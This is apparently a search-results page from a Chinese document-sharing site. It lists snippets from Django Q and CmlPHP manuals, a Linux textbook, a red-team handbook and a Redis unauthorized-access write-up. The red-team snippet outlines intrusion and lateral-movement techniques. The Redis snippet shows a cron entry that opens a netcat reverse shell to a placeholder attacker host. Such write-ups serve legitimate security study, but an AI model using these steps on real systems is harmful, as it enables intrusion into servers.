Django Q Documentation
Release 0.2.20 码力 | 25 页 | 188.69 KB | 2 年前3
Django Q Documentation
Release 0.6.40 码力 | 42 页 | 376.79 KB | 2 年前3- Django Q Documentation
Release 0.3.60 码力 | 35 页 | 198.62 KB | 2 年前3
- Django Q Documentation
Release 1.3.60 码力 | 81 页 | 512.34 KB | 2 年前3
- Django Q Documentation
Release 1.3.60 码力 | 81 页 | 512.48 KB | 2 年前3
- HW弹药库之红队作战⼿册默认工作在tcp 3306端口,弱口令,敏感账号密码泄露,提权(只适用于部分老系统)]| |REDIS|\[ 默认工作在tcp 6379端口,弱口令,未授权访问,写文件(webshell,启动项,计划任务),提权 ]| |POSTGRESQL|\[ 默认工作在tcp 5432端口,弱口令,敏感信息泄露 ]| |LDAP|\[ 默认工作在tcp 389端口,未授权访问,弱口令,敏感账号密码泄露 ]| 获取当前系统所有登录成功的日志 [针对 windows ] 获取本机所有已安装软件的详细列表 [主要为抓密码,提权,留后门做准备] 获取本机各个浏览器中保存的所有书签页及历史浏览记录 获取当前用户创建的所有计划任务列表及计划任务所对应的执行脚本内容 [有些执行脚本中很可能存的有各种连接账号密码] 获取当前用户桌面及回收站里的所有文件列表 获取当前系统的所有存在suid权限的二进制程序 获取当前系统代理 [ip ("重中之重")] - 从 Windows 平台 横向至 Windows 平台 注:以下某些远程执行方式,即可直接用明文账号密码亦可基于pth来进行,不局限 远程服务管理 [ SCM ] 远程创建执行计划任务 [ Scheduled Tasks ] WMI 远程执行 [ WMI ] 针对高版本Windows 的WinRM 远程执行 DCOM 远程执行 [ 需要目标Windows机器事先已关闭防火墙 ]0 码力 | 19 页 | 1.20 MB | 2 年前3
- Linux就该这么学 第2版100 4.3.2 for 条件循环语句 ..... 102 4.3.3 while 条件循环语句 ..... 104 4.3.4 case 条件测试语句 ..... 106 4.4 计划任务服务程序 ..... 107 复习题 ..... 110 第5章 用户身份与文件权限 ..... 111 5.1 用户身份与能力 ..... 111 5.1.1 id 命令 ... 门——RH124、RH134、RH294。RH124 涵盖了系统管理的基础知识,例如安装系统、用户管理、网络管理、远程管理以及软件管理等;RH134 涉及 Shell 自动化脚本的编写、磁盘管理、计划任务、系统安全维护等;RH294 主要介绍 Ansible 自动化管理工具的使用方法。本书将上述内容一网打尽,一个不漏。 红帽认证考试的形式为上机实操,且在一天内考完。上午的 RHCSA 认证的考试时长是 命令、命令语法与 Shell 脚本中的各种流程控制语句通过 Vim 编辑器写到 Shell 脚本中并结合到一起,实现最终能够自动化工作的脚本文件;本章最后演示了怎样通过 at 命令与 crond 计划任务服务来分别实现一次性的系统任务设置和长期性的系统任务设置,从而让日常的工作更加高效,更自动化。 第 5 章,用户身份与文件权限:本章详细讲解了文件的所有者、所属组以及其他人可对文件进行的读(r)写(w)执行(x)等操作,以及如何在0 码力 | 552 页 | 22.25 MB | 2 年前3
- 常见Redis未授权访问漏洞总结命令,可以进行写文件操作,攻击者可以成功将自己的 ssh 公钥写入目标服务器的 /root/.ssh 文件夹的 authotrized_keys 文件中,进而可以使用对应私钥直接使用 ssh 服务登录目标服务器、添加计划任务、写入 Webshell 等操作。 ## 漏洞利用 环境介绍 攻击机:windows10 目标靶机:Centos7 ip地址:192.168.18.138 连接工具:xshell ## preferred_lft forever / # echo '** * * * /usr/bin/nc {vps_ip} 9999 -e /bin/sh' >> /tmp/root #添加计划任务 cat /tmp/root # 查看/tmp/root 文件 exit #退出容器0 码力 | 44 页 | 19.34 MB | 2 年前3
CmlPHP v2.x 开发手册
为web应用服务存放目录 web/View 可选 这web应用存放模板文件目录 ## proxxx/Config目录 Config 目录即为项目全局配置文件存放目录,框架会自动识别当前运行的环境是开发/cli(计划任务下)/正式环境,读取相应目录下的配置文件。下面对 Config 目录下的文件做详细说明 自v2.7.2起。cli/development/product 这三个环境的判断组件也是可拨插替换的。也就是说假如你觉得 在开发->配置->cli章节说过,在cli环境下框架默认载入的是Config/cli/normal.php 这个通用配置文件 在v2.7.1以下的版本中要在命令行中运行应用可采用以下方式: 比如: 通过系统计划任务执行程序。可以采用以下命令: php /data/www/cmlproject/index.php web/Log/intoDb 即有一个采用CmlPHP的项目路径为 /data/www/cmlproject/0 码力 | 251 页 | 973.37 KB | 2 年前3 CmlPHP v2.x 开发手册
• web/View 可选 这web应用存放模板文件目录 ## proxxx/Config 目录 Config 目录即为项目全局配置文件存放目录,框架会自动识别当前运行的环境是开发/cli(计划任务下)/正式环境,读取相应目录下的配置文件。下面对 Config 目录下的文件做详细说明 自v2.7.2起。cli/development/product这三个环境的判断组件也是可拨插替换的。也就 在开发->配置->cli章节说过,在cli环境下框架默认载入的是Config/cli/normal.php 这个通用配置文件 在v2.7.1以下的版本中要在命令行中运行应用可采用以下方式: 比如: 通过系统计划任务执行程序。可以采用以下命令: php /data/www/cmlproject/index.php web/Log/intoDb 即有一个采用CmlPHP的项目路径为 /data/www/cmlproject/0 码力 | 143 页 | 1.54 MB | 2 年前3
共 37 条
- 1
- 2
- 3
- 4